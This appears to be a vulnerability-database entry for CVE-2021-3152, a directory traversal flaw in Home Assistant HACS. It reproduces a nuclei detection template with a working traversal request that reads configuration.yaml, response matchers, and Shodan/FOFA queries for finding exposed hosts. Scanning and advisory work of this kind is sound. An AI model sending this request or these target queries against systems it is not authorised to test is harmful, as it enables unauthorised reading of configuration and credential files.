Home Assistant HACS - Local File Inclusion

30 Jun 2026 04:56:11 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Home Assistant HACS before 2021.1.3 allows directory traversal in custom integrations, enabling file access.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ArchLinux | [ASA-202101-44] home-assistant: information disclosure | 29 Jan 2021 00:00 | archlinux |
| Circl | CVE-2021-3152 | 22 Apr 2026 08:43 | circl |
| CNNVD | Home Assistant Path Traversal Vulnerability | 26 Jan 2021 00:00 | cnnvd |
| CNVD | Home Assistant Directory Traversal Vulnerability | 29 Jan 2021 00:00 | cnvd |
| CVE | CVE-2021-3152 | 21 Jan 2021 15:10 | cve |
| Cvelist | CVE-2021-3152 | 21 Jan 2021 15:10 | cvelist |
| NVD | CVE-2021-3152 | 26 Jan 2021 18:16 | nvd |
| OpenVAS | Home Assistant < 2021.1.3 Path Traversal Vulnerability | 15 Jun 2023 00:00 | openvas |
| Prion | Directory traversal | 26 Jan 2021 18:16 | prion |
| Positive Technologies | PT-2021-19401 | 21 Jan 2021 00:00 | ptsecurity |

id: CVE-2021-3152

info:
  name: Home Assistant HACS - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    Home Assistant before 2021.1.3 lacks a protection layer against directory-traversal attacks in custom integrations, letting attackers access arbitrary files, exploit requires attacker to deploy malicious custom integration.
  impact: |
    Attackers can access sensitive files on the system, potentially leading to information disclosure or further system compromise.
  remediation: Update to version 2021.1.3 or later to include protection against directory traversal in custom integrations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3152
    - https://lyghtnox.gitlab.io/posts/hacs-exploit/
    - https://www.home-assistant.io/blog/2021/01/22/security-disclosure/
    - https://github.com/hacs/integration/commit/f2b7cb711e41a94b81610f6ff96ea314e9879114
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3152
    epss-score: 0.02231
    epss-percentile: 0.80544
    cwe-id: CWE-22
  metadata:
    verified: false
    max-request: 1
    vendor: hacs
    product: integration
    shodan-query: title:"Home Assistant"
    fofa-query: title="Home Assistant"
  tags: cve,cve2021,hacs,homeassistant,lfi

http:
  - raw:
      - |
        GET /hacsfiles/../../configuration.yaml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "default_config:"
          - "homeassistant:"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a00463044022000be5fb761e5627e8a25fe00c7243c918df1ac78733841e9b5afd9ed93ed8cd002206ce45db997c381d2691f5e3e41f29dcea6cc72e7202554eeb0e4b10b66ff3f4b:922c64590222798bb761d5b6d8e72950

Scores (current as of 22 Apr 2026 08:43)
Vulners AI Score: 6.2 (Medium risk)
CVSS 2: 5
CVSS 3.1: 5.3
EPSS: 0.02231